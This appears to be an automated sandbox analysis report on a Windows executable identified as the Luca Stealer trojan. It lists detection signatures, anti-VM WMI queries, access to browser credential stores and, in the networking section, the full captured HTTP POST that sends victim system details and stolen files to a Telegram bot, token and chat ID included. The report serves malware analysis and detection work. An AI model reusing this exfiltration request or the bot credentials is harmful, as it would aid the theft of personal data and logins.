Windows Analysis Report
765iYbgWn9.exe

Overview

General Information

Sample name: 765iYbgWn9.exe (renamed because original name is a hash value)
Original sample name: 0534ab10184891cd61d262bfd79b7b4c.exe
Analysis ID: 1483815
MD5: 0534ab10184891cd61d262bfd79b7b4c
SHA1: a13d37959a92bc37f4d3c42eb53d77cc760f448a
SHA256: 191272e200345dcb0a7a8c8c975a8b07847f07b9d9f0c3af472fdb88092aee0b
Tags: 64 exe trojan

Detection

Luca Stealer
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
AI detected suspicious sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 765iYbgWn9.exe (PID: 1996 cmdline: "C:\Users\user\Desktop\765iYbgWn9.exe" MD5: 0534AB10184891CD61D262BFD79B7B4C)
    • powershell.exe (PID: 6768 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
765iYbgWn9.exe | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
Process Memory Space: 765iYbgWn9.exe PID: 1996 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
Process Memory Space: 765iYbgWn9.exe PID: 1996 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.0.765iYbgWn9.exe.7ff6a5820000.0.unpack | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\765iYbgWn9.exe", ParentImage: C:\Users\user\Desktop\765iYbgWn9.exe, ParentProcessId: 1996, ParentProcessName: 765iYbgWn9.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 6768, ProcessName: powershell.exe
No Snort rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-29T07:33:02.984024+0200 | 2022930 | 443 | 49714 | TCP | A Network Trojan was detected
2024-07-29T07:32:24.993610+0200 | 2022930 | 443 | 49705 | TCP | A Network Trojan was detected
2024-07-29T07:32:56.286114+0200 | 2039009 | 443 | 49713 | TCP | A Network Trojan was detected

            AV Detection

Source: 765iYbgWn9.exe | ReversingLabs: Detection: 50%
Source: 765iYbgWn9.exe | Virustotal: Detection: 32%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.3% probability
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: 765iYbgWn9.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: mp\Symbols\ntkrnlmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2470462357.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: APPDATAlmp.pdb source: 765iYbgWn9.exe, 00000000.00000003.2472147301.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472751371.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471769592.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470462357.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2473008318.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472505961.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471381267.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470855696.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rust_stealer_xss.pdb source: 765iYbgWn9.exe
            Source: Binary string: lmp.pdb source: 765iYbgWn9.exe, 00000000.00000003.2472147301.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472751371.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471769592.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470462357.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2473008318.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472505961.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471381267.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470855696.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\VirtualStore\ntkrnlmp.pdb source: 765iYbgWn9.exe, 00000000.00000003.2465177046.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466096832.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466310468.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469067738.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469257983.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2464719662.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465796025.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468790555.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468349825.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JDSOXXXWOA.docxnlmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2472147301.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472751371.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471769592.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2473008318.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2472505961.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2471381267.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2470855696.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2465177046.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466096832.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2466310468.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469067738.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2469257983.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2464719662.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465796025.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468790555.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2468349825.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: lmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2510453634.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\

            Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20EC6CD_O6G%20(1280,%201024)%0AHWID:%205229958482931895%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20&parse_mode=HTML HTTP/1.1 | content-type: multipart/form-data; boundary=a823006a12d4c370-61345550b38b208b-8e57514f4d7e4bc0-4d5848ed09e1c9e1 | content-length: 891245 | accept: */* | host: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /?output=json HTTP/1.1 | accept: */* | host: ipwho.is
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 195.201.57.90
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ipwho.is
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ipwho.is
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.33%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-04:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20EC6CD_O6G%20(1280,%201024)%0AHWID:%205229958482931895%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\765iYbgWn9.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2020%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0ATagged%20URLs:%20%E2%9D%8C%0ATagged%20Cookies:%20%E2%9D%8C%0A%0ATags%20Passwords:%20%0A%0ATags%20Cookies:%20&parse_mode=HTML HTTP/1.1 | content-type: multipart/form-data; boundary=a823006a12d4c370-61345550b38b208b-8e57514f4d7e4bc0-4d5848ed09e1c9e1 | content-length: 891245 | accept: */* | host: api.telegram.org
Source: 765iYbgWn9.exe | String found in binary or memory: http://ns.adobe.
Source: 765iYbgWn9.exe | String found in binary or memory: http://www.w3.or
Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 765iYbgWn9.exe | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportC:
Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: 765iYbgWn9.exe | Binary string: Afdfd\Device\Afd\Mio
Source: 765iYbgWn9.exe | Binary string: Failed to open \Device\Afd\Mio:
Source: classification engine | Classification label: mal72.troj.spyw.winEXE@4/15@3/2
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Users\user\Desktop\765iYbgWn9.exe | File created: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\
Source: 765iYbgWn9.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\765iYbgWn9.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 765iYbgWn9.exe, 00000000.00000003.2466694867.0000019C72E55000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2465177046.0000019C7100E000.00000004.00000020.00020000.00000000.sdmp, 765iYbgWn9.exe, 00000000.00000003.2464670639.0000019C7102C000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 765iYbgWn9.exe, 00000000.00000000.2071534382.00007FF6A5C17000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: unknown | Process created: C:\Users\user\Desktop\765iYbgWn9.exe "C:\Users\user\Desktop\765iYbgWn9.exe"
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Section loaded: cryptnet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\765iYbgWn9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 765iYbgWn9.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 765iYbgWn9.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: 765iYbgWn9.exe | Static file information: File size 5438976 > 1048576
Source: 765iYbgWn9.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3a4a00
Source: 765iYbgWn9.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x168200
Source: 765iYbgWn9.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 765iYbgWn9.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: lmp.pdbE source: 765iYbgWn9.exe, 00000000.00000003.2510453634.0000019C7100F000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3432
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3090
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100 Thread sleep count: 3432 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100 Thread sleep count: 3090 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\765iYbgWn9.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
            Source: C:\Users\user\Desktop\765iYbgWn9.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
